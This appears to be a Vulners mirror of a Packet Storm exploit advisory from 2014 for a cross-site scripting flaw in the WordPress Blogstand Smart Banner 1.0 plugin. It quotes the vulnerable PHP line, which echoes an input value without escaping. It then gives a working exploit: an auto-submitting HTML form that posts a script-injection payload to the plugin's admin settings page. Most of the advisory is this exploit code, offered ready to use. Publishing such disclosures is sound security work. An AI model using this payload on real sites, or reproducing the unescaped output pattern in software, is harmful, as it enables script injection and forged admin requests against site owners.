Lucene search
K

WordPress Blogstand Smart Banner 1.0 Cross Site Scripting

🗓️ 29 Jun 2014 00:00:00Reported by ACC3SSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

WordPress Blogstand Smart Banner 1.0 Cross Site Scripting vulnerability in input fiel

Code
`######################  
# Exploit Title : Wordpress blogstand-smart-banner.1.0 Cross Site Scripting  
  
# Exploit Author : Ashiyane Digital Security Team  
  
# Vendor Homepage : http://wordpress.org/plugins/blogstand-smart-banner/  
  
# Software Link :   
http://downloads.wordpress.org/plugin/blogstand-smart-banner.1.0.zip  
  
# Date : 2014-06-28  
  
# Tested on : Windows 7 / Mozilla Firefox  
######################  
  
# Location : http://localhost/wp-admin/options-general.php?page=bs-banner  
  
######################  
  
# Vulnerable code :  
  
<td><input type="text" name="<?php echo $blog_id_field; ?>"   
value="<?php echo $blog_id; ?>" /></td>  
  
  
######################  
  
Exploit Code:  
  
<html>  
<body>  
<form name="form1" method="post"   
action="http://localhost/wp-admin/options-general.php?page=bs-banner">  
<input type="hidden" name="blogstand_hidden" value="SET">  
<input type="hidden" name="bs_blog_id" value='"/><script>alert(1);</script>'/>  
<script language="Javascript">  
setTimeout('form1.submit()', 1);  
</script>  
</form>  
</body>  
</html>  
  
  
#####################  
  
Discovered By : ACC3SS  
  
#####################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation